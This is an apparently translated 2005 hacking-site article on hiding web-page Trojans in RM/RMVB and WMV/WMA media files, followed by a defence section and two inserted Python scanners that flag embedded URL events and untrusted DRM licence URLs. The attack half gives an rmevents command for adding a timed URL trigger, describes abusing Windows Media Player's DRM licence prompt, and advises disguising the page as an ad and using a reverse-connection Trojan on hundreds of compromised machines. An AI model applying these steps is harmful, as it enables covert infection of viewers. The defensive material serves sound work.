myhack58 | 佚名 (Anonymous) | MYHACK58:6220054039
Oct 25, 2005 - 12:00 a.m.

Media-file Trojans do huge harm: attack and defence in practice (illustrated)

Source: www.myhack58.com

The two media-file families most widely circulated on the network today are RM/RMVB and WMV/WMA. Both stream well, so almost all online films and music use one of the two formats. If a Trojan is embedded in such a media file, the concealment this gives it means victims are hit by a web-page Trojan without noticing anything; the danger is obvious.

**Exploit: hanging a Trojan on a media file without anyone noticing**

**RM, RMVB: adding the Trojan**

Helix Producer Plus is a graphical, professional streaming-media authoring tool. It converts files of other formats to RM or RMVB, and it can also re-edit an existing RM file; while editing we can insert a previously prepared web-page Trojan. As soon as the edited media file is opened, the embedded web-page Trojan opens with it, and we can even control the moment it fires, which makes it harder to notice.

Step 1: Download Helix Producer Plus and click "Next" all the way through to install it. Then pick the RM film into which the web-page Trojan will be inserted, rename it film.rm, and copy it into the RealMediaEditor folder under the Helix Producer Plus installation directory.

Step 2: In the same folder create a new text file named test.txt and write this one command into it: "u 00:07:00 00:07:30 http://www.***.com/index.php". The command means: when playback reaches the 7-minute mark, trigger an event that opens the URL, and end the event at 7 minutes 30 seconds; the last field is the URL, which we point at our web-page Trojan (building and configuring the web-page Trojan has been described many times already and is not repeated here). Anyone who watches the media file then has the Trojan page opened for them and is hit without noticing (Figure 1).
[Figure 1]
Tips: the web-page Trojan should be as inconspicuous as possible and imitate a normal page; if a page suddenly pops up while someone is watching a film they will become suspicious. Best of all is to dress it up as an advertisement: people take it for an ad, close it, and by then the Trojan has already been planted. For the Trojan itself, prefer a reverse-connection Trojan such as Gray Pigeon (灰鸽子); otherwise, once you have a few hundred compromised machines (肉鸡), connecting to each one by hand becomes very tedious.

Step 3: Run CMD (the command prompt), change into the RealMediaEditor folder, and enter: "rmevents -i film.rm -e test.txt -o film2.rm". This is the key step: it uses rmevents.exe, which ships with Helix Producer Plus, to merge the URL-trigger event in test.txt into film.rm and save the result as film2.rm. The newly generated film2.rm is the media file carrying the web-page Trojan (Figure 2).
[Figure 2]
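A file like film2.rm differs from the original only in that it carries an extra logical stream whose packets hold the URL event, so a defender can find the trigger without playing the file. The following Python is an added example, not code from the article or from Helix: it walks the RealMedia container (the .RMF, MDPR and DATA chunk layout of the public RealMedia format) and reports any non-audio/video stream whose packets or stream header contain a URL. The MIME type used for the events stream, the packet encoding of the event and the sample file built inline are assumptions constructed for the demo; the URL search is a heuristic, since the page does not document how rmevents encodes the event.

```python
"""Scan a RealMedia (.rm/.rmvb) container for streams that carry URL triggers."""
import re
import struct

# Anything that looks like a URL with a scheme a player might hand to a browser.
URL_RE = re.compile(rb"(?:https?|rtsp|pnm|ftp|file)://[\x21-\x7e]+")

# Assumed MIME type of the Helix events stream; the article does not name it.
EVENTS_MIME = b"application/x-pn-realevent"


def rm_chunk(cid, version, body):
    """RealMedia chunk: 4-byte id, big-endian 32-bit total size, 16-bit version, body."""
    return cid + struct.pack(">IH", 10 + len(body), version) + body


def mdpr(stream_no, mime, name=b"", type_specific=b""):
    """Media Properties (MDPR) header for one logical stream (bitrates etc. zeroed)."""
    fixed = struct.pack(">H7I", stream_no, 0, 0, 0, 0, 0, 0, 0)
    body = (fixed + bytes([len(name)]) + name + bytes([len(mime)]) + mime
            + struct.pack(">I", len(type_specific)) + type_specific)
    return rm_chunk(b"MDPR", 0, body)


def data_packet(stream_no, timestamp_ms, payload):
    """Version-0 DATA packet: version, length (incl. 12-byte header), stream, ts, group, flags."""
    return struct.pack(">HHHIBB", 0, 12 + len(payload), stream_no, timestamp_ms, 0, 0) + payload


def build_sample_rm(with_event):
    """Constructed sample: one audio stream plus, optionally, an events stream carrying a URL."""
    rmf = rm_chunk(b".RMF", 0, struct.pack(">II", 0, 3 if with_event else 2))
    headers = [mdpr(0, b"audio/x-pn-realaudio", b"Audio Stream")]
    packets = [data_packet(0, 0, b"\x00" * 16)]
    if with_event:
        headers.append(mdpr(1, EVENTS_MIME, b"Event Stream"))
        # 420000 ms = 7:00, the trigger time used in the article; payload encoding is assumed.
        packets.append(data_packet(1, 420000, b"u http://www.***.com/index.php"))
    data_body = struct.pack(">II", len(packets), 0) + b"".join(packets)
    return rmf + b"".join(headers) + rm_chunk(b"DATA", 0, data_body)


def scan_rm(data):
    """Return (streams, hits): stream_no -> MIME type, and [(stream_no, where, url)] hits."""
    streams, hits, pos = {}, [], 0
    while pos + 10 <= len(data):
        cid = data[pos:pos + 4]
        size, _version = struct.unpack(">IH", data[pos + 4:pos + 10])
        if size < 10 or pos + size > len(data):
            break  # truncated or corrupt chunk: stop rather than read past the end
        body = data[pos + 10:pos + size]
        if cid == b"MDPR":
            stream_no = struct.unpack(">H", body[:2])[0]
            p = 30                                   # past stream_no + seven 32-bit fields
            name_len = body[p]; p += 1 + name_len
            mime_len = body[p]; mime = body[p + 1:p + 1 + mime_len]; p += 1 + mime_len
            tsd_len = struct.unpack(">I", body[p:p + 4])[0]
            type_specific = body[p + 4:p + 4 + tsd_len]
            streams[stream_no] = mime
            hits += [(stream_no, "MDPR", u) for u in URL_RE.findall(type_specific)]
        elif cid == b"DATA":
            num_packets = struct.unpack(">I", body[:4])[0]
            p = 8                                    # past num_packets + next_data_header
            for _ in range(num_packets):
                if p + 12 > len(body):
                    break
                ver, length, stream_no, ts = struct.unpack(">HHHI", body[p:p + 10])
                hdr = 12 if ver == 0 else 13
                if length < hdr:
                    break
                payload = body[p + hdr:p + length]
                mime = streams.get(stream_no, b"")
                # Audio/video payloads are compressed media; only other stream types are inspected.
                if not mime.startswith((b"audio/", b"video/")):
                    hits += [(stream_no, "DATA@%dms" % ts, u) for u in URL_RE.findall(payload)]
                p += length
        pos += size
    return streams, hits


if __name__ == "__main__":
    for stream_no, where, url in scan_rm(build_sample_rm(True))[1]:
        print("stream %d %s -> %s" % (stream_no, where, url.decode()))
```

Run it against a real file with `scan_rm(open("film2.rm", "rb").read())`; a clean RM file normally lists only audio/video streams and returns no hits, so any hit on a stream with an unfamiliar MIME type is worth a look before the file is opened in RealPlayer.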
**WMV, WMA: adding the Trojan**

For WMA and WMV files we use their default player, Windows Media Player, and its "Digital Rights Management can load an arbitrary web page" weakness to plant the Trojan. When a file prepared this way is played, the player first shows a prompt saying the file is DRM-encrypted and that a licence (certificate) must be obtained from a URL; that URL is the web-page Trojan address we set in advance, and as soon as the user clicks "Yes" to verify, the Trojan is planted. The player simply follows whatever licence URL the file header declares; nothing in the file proves that the URL belongs to a real licence server. As with RM files, inserting the Trojan into a WMV file needs a tool, the "WMDRM encryption package" (WMDRM加密包). It DRM-encrypts WMA and WMV files and exists to protect copyright on media files, but in an attacker's hands it becomes the hacker's accomplice.

Install the "WMDRM encryption package" and run it; the interface is very simple (Figure 3). On the "custom package" tab, click the Browse button to the right of "source file" and choose a WMA or WMV file; under "output directory" choose where the generated malicious file is saved; in "output file suffix" enter the extension for the generated file (keep it the same as the source file). Then switch to the "authentication string" tab and enter the web-page Trojan address in the "authentication URL" field, for example http://www.***.com/index.php, leaving everything else at its default. Switch back to the "custom package" tab and click "encryption package"; the malicious media file with the web-page Trojan planted in it is generated.
[Figure 3]
When the user opens the malicious media file, Windows Media Player asks to obtain the licence (Figure 4); clicking "OK" pops up our Trojan page.
[Figure 4]
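The "authentication URL" the packager writes into the file is stored in the ASF header, so it can be read out and checked against the licence servers you actually expect before Windows Media Player is ever allowed to contact it. The following Python is an added example, not code from the article or from the WMDRM packager: it parses the ASF Header Object and returns the licence URL from a Content Encryption Object (the older WMDRM layout: secret data, protection type, key ID, licence URL) or the `<LA_URL>` element inside an Extended Content Encryption Object's WRMHEADER. The object GUIDs and field order follow the public ASF specification; the sample header built inline, the allow-list of hosts and the assumption that a real WRMHEADER may be stored as UTF-16LE XML are mine.

```python
"""Extract WMDRM licence-acquisition URLs from an ASF (WMA/WMV) header without playing it."""
import re
import struct
import uuid
from urllib.parse import urlparse

# ASF object GUIDs (stored little-endian in the file, hence bytes_le).
ASF_HEADER = uuid.UUID("75B22630-668E-11CF-A6D9-00AA0062CE6C").bytes_le
CONTENT_ENCRYPTION = uuid.UUID("2211B3FB-BD23-11D2-B4B7-00A0C955FC6E").bytes_le
EXT_CONTENT_ENCRYPTION = uuid.UUID("298AE614-2622-4C17-B935-DAE07EE9289C").bytes_le
LA_URL_RE = re.compile(rb"<LA_URL>(.*?)</LA_URL>", re.S)


def _len_prefixed(buf, pos):
    """Read a 32-bit little-endian length followed by that many bytes."""
    n = struct.unpack_from("<I", buf, pos)[0]
    return buf[pos + 4:pos + 4 + n], pos + 4 + n


def asf_object(guid, data):
    """ASF object: 16-byte GUID, 64-bit total size (header included), data."""
    return guid + struct.pack("<Q", 24 + len(data)) + data


def build_sample_asf(license_url, extended=False):
    """Constructed sample: a Header Object holding one (extended) content-encryption object."""
    if extended:
        xml = (b'<WRMHEADER version="2.0.0.0"><DATA><LA_URL>' + license_url
               + b"</LA_URL></DATA></WRMHEADER>")
        inner = asf_object(EXT_CONTENT_ENCRYPTION, struct.pack("<I", len(xml)) + xml)
    else:
        secret, ptype, keyid, url = b"\x00" * 4, b"DRM\x00", b"KEYID00\x00", license_url + b"\x00"
        body = b"".join(struct.pack("<I", len(x)) + x for x in (secret, ptype, keyid, url))
        inner = asf_object(CONTENT_ENCRYPTION, body)
    head = struct.pack("<IBB", 1, 1, 2) + inner      # object count, reserved1, reserved2
    return asf_object(ASF_HEADER, head)


def license_urls(data):
    """Return the licence URLs declared in the ASF header (empty for unprotected files)."""
    if data[:16] != ASF_HEADER:
        raise ValueError("not an ASF file")
    header_size = struct.unpack_from("<Q", data, 16)[0]
    count = struct.unpack_from("<I", data, 24)[0]
    pos, urls = 30, []
    for _ in range(count):
        if pos + 24 > header_size:
            break                                    # truncated header: stop cleanly
        guid = data[pos:pos + 16]
        size = struct.unpack_from("<Q", data, pos + 16)[0]
        if size < 24:
            break
        body = data[pos + 24:pos + size]
        if guid == CONTENT_ENCRYPTION:
            p = 0
            _secret, p = _len_prefixed(body, p)
            _protection_type, p = _len_prefixed(body, p)
            _key_id, p = _len_prefixed(body, p)
            url, _ = _len_prefixed(body, p)
            urls.append(url.rstrip(b"\x00").decode("ascii", "replace"))
        elif guid == EXT_CONTENT_ENCRYPTION:
            blob, _ = _len_prefixed(body, 0)
            # Real WMDRM files are assumed to store the XML as UTF-16LE; the sample uses ASCII.
            for text in (blob, blob.decode("utf-16-le", "ignore").encode("utf-8", "ignore")):
                found = LA_URL_RE.findall(text)
                if found:
                    urls += [u.decode("utf-8", "replace") for u in found]
                    break
        pos += size
    return urls


def untrusted_license_urls(data, allowed_hosts):
    """Licence URLs whose host is not a known licence server: the article's attack case."""
    return [u for u in license_urls(data) if urlparse(u).hostname not in allowed_hosts]


if __name__ == "__main__":
    sample = build_sample_asf(b"http://attacker.example/index.php")
    print(untrusted_license_urls(sample, {"license.example.net"}))
```

With a real file, `untrusted_license_urls(open("clip.wmv", "rb").read(), {...})` run at a mail gateway or download proxy lets you reject a "DRM-protected" clip whose licence server is an arbitrary web host, which is exactly the file the packager above produces.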
Where there is attack there is defence; we need not sit still and be at their mercy. Malicious media files are not as mysterious as imagined: with a little knowledge of how to clean out web-page Trojans you can stop them from running at all.

**Defence: dealing with malicious media files**

**RM, RMVB: removing the Trojan**

Take the RM Trojan made above as the example. Create a new text file test.txt with empty contents, then in CMD run "rmevents -i <infected file>.rm -e test.txt -o film.rm". This overwrites the URL-trigger event in the same way it was inserted, and the output film.rm is a clean media file with no Trojan in it.

If you are not comfortable with the command prompt, use Helix RealMedia Editor to remove the web-page Trojan. Open rmevents.exe in the RealMediaEditor folder; its interface is shown in Figure 5. Likewise create an empty test.txt, then in the Helix RealMedia Editor menu bar click "Tools" and choose "Merge Events". Select the test.txt just created and click "OK". Finally choose "Save RealMedia File" from the "File" menu to save the media file. The principle is the same as removing the web-page Trojan with rmevents.exe.
[Figure 5]
**WMA, WMV: removing the Trojan**
Because this abuses a Windows Media Player weakness, we cannot clean the malicious DRM information out of the media file; all we can do is apply the patch, after which a malicious WMA or WMV file achieves nothing in a patched Windows Media Player. Patch download address: http://www.microsoft.com/technet/security/ . Even on a patched player, a prompt to fetch a licence from an unfamiliar URL should be declined, since the URL in the file is whatever the person who packaged it chose.

We can also play media files in a different player, such as Baofeng (暴风影音) or MPlayer; some of them ignore the web-page events embedded in media files, which also gives some protection against media web Trojans.

Security depends largely on the user's own awareness; only awareness lowers the odds of being hit: do not open media files of unknown origin, do not wander into strange websites, and so on. Awareness alone is not enough, though; we also need helpers such as antivirus software. After all, any web-page Trojan has to be downloaded to the local machine before it can run, and antivirus can stop the Trojan from running, so keep the antivirus software and its signature database up to date. Only when defence stays ahead of attack can we claim real security.